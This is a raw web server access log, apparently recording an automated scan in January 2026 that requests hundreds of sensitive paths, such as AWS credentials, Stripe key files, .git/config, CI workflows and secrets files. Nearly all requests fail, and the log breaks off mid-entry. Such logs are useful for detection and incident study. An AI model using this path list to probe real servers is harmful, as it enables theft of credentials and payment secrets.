"/swagger.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:05 +0000] 400 - GET http 92.249.249.197 "/swagger.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:05 +0000] 400 - GET http 92.249.249.197 "/gatsby-config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:06 +0000] 404 - GET http 92.249.249.197 "/backend/config/default.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:06 +0000] 404 - GET http 92.249.249.197 "/app.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:06 +0000] 400 - GET http 92.249.249.197 "/admin/controllers/merchant.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:07 +0000] 400 - GET http 92.249.249.197 "/admin/controllers/partner.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:07 +0000] 400 - GET http 92.249.249.197 "/api/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:08 +0000] 404 - GET http 92.249.249.197 "/api/objects/codes.php.save" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:08 +0000] 400 - GET http 92.249.249.197 "/apis/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:09 +0000] 400 - GET http 92.249.249.197 "/apis/controllers/users.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:10 +0000] 400 - GET http 92.249.249.197 "/app.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:10 +0000] 404 - GET http 92.249.249.197 "/backend/config/development.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:10 +0000] 400 - GET http 92.249.249.197 "/cloud/Scraper.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:11 +0000] 404 - GET http 92.249.249.197 "/config/application.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:11 +0000] 404 - GET http 92.249.249.197 "/config/storage.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:11 +0000] 400 - GET http 92.249.249.197 "/configs/routes-4aug.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:12 +0000] 400 - GET http 92.249.249.197 "/configs/routes.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:12 +0000] 404 - GET http 92.249.249.197 "/configs/s3_config.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:13 +0000] 400 - GET http 92.249.249.197 "/controller/admin/post.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:13 +0000] 400 - GET http 92.249.249.197 "/controller/api/post.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:14 +0000] 400 - GET http 92.249.249.197 "/controllers/settings.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:15 +0000] 404 - GET http 92.249.249.197 "/getcpuutil.php-bakworking" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:15 +0000] 400 - GET http 92.249.249.197 "/helper.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:16 +0000] 400 - GET http 92.249.249.197 "/helper/EmailHelper.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:16 +0000] 400 - GET http 92.249.249.197 "/index.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:16 +0000] 200 - GET http 92.249.249.197 "/index.html" [Client 45.148.10.247] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:16 +0000] 404 - GET http 92.249.249.197 "/my_env/chakaash.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:16 +0000] 404 - GET http 92.249.249.197 "/my_env/newsletter.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:16 +0000] 404 - GET http 92.249.249.197 "/my_env/palash.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:16 +0000] 400 - GET http 92.249.249.197 "/mytest/astech_robot.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:17 +0000] 400 - GET http 92.249.249.197 "/partner/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:17 +0000] 404 - GET http 92.249.249.197 "/config/settings.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:17 +0000] 404 - GET http 92.249.249.197 "/config/settings.local" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:17 +0000] 404 - GET http 92.249.249.197 "/.circleci/configs/development.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:17 +0000] 404 - GET http 92.249.249.197 "/config/settings.prod" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:17 +0000] 404 - GET http 92.249.249.197 "/app/config/parameters.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:17 +0000] 404 - GET http 92.249.249.197 "/config/parameters.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:18 +0000] 400 - GET http 92.249.249.197 "/user/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:18 +0000] 400 - GET http 92.249.249.197 "/user/controllers/index.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/.AWS_/credentials" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/config/local.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/backend/config/settings.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/api/config/config.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/admin/config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/.travis.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/aws.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/sms.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/config/config.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 404 - GET http 92.249.249.197 "/main.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:19 +0000] 400 - GET http 92.249.249.197 "/helpers/utility.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:20 +0000] 400 - GET http 92.249.249.197 "/server/s3.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:21 +0000] 400 - GET http 92.249.249.197 "/s3.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:21 +0000] 404 - GET http 92.249.249.197 "/debug/default/view" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:21 +0000] 404 - GET http 92.249.249.197 "/aws/credentials" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:21 +0000] 404 - GET http 92.249.249.197 "/.aws/config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:21 +0000] 400 - GET http 92.249.249.197 "/config/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:22 +0000] 404 - GET http 92.249.249.197 "/config/stripe.ts" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:22 +0000] 400 - GET http 92.249.249.197 "/server/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:23 +0000] 400 - GET http 92.249.249.197 "/backend/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:23 +0000] 400 - GET http 92.249.249.197 "/api/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:24 +0000] 404 - GET http 92.249.249.197 "/api/stripe.ts" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:24 +0000] 400 - GET http 92.249.249.197 "/functions/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:25 +0000] 400 - GET http 92.249.249.197 "/functions/payment.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:25 +0000] 400 - GET http 92.249.249.197 "/routes/payment.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:26 +0000] 400 - GET http 92.249.249.197 "/routes/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:27 +0000] 400 - GET http 92.249.249.197 "/controllers/stripeController.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:27 +0000] 400 - GET http 92.249.249.197 "/utils/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:28 +0000] 400 - GET http 92.249.249.197 "/modules/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:29 +0000] 400 - GET http 92.249.249.197 "/stripe/index.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:29 +0000] 404 - GET http 92.249.249.197 "/config/services.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/config/stripe.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/app/Services/StripeService.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/app/Http/Controllers/StripeController.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/bootstrap/cache/config.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/storage/app/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/storage/app/keys/stripe.key" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/app/config/stripe.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/app/config/payment.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/config/settings/stripe.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/settings_stripe.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/app/settings_stripe.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/project/settings/payment.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/core/payment.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/secrets/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/instance/config.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/config/initializers/stripe.rb" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/config/secrets.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/config/credentials.yml.enc" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/config/payment.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/config/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:30 +0000] 404 - GET http 92.249.249.197 "/config/stripe.yaml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/internal/stripe/keys.go" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/.github/workflows/stripe.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/.github/workflows/deploy.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/.github/workflows/build.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/.github/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/.gitlab-ci.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/.circleci/config.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/.bitbucket/pipelines.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 404 - GET http 92.249.249.197 "/config/webhook.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:31 +0000] 400 - GET http 92.249.249.197 "/functions/webhook.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:32 +0000] 400 - GET http 92.249.249.197 "/api/webhook.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:33 +0000] 400 - GET http 92.249.249.197 "/routes/webhook.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:33 +0000] 404 - GET http 92.249.249.197 "/webhook/stripe.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:33 +0000] 404 - GET http 92.249.249.197 "/webhooks/settings.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:33 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:33 +0000] 404 - GET http 92.249.249.197 "/.git/HEAD" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:33 +0000] 404 - GET http 92.249.249.197 "/composer.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/package.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/requirements.txt" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/Gemfile" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/pom.xml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/.dockerignore" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/Dockerfile" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/.github/workflows/" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/terraform/" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/.terraform/" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/docker-compose.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/Makefile" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/tox.ini" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/setup.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/gradle.properties" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/build.gradle" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:34 +0000] 404 - GET http 92.249.249.197 "/settings.gradle" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/SonarQube.properties" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/sonar-project.properties" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/config/stripe.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/config/services/stripe.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/settings/stripe.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/config/credentials.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET 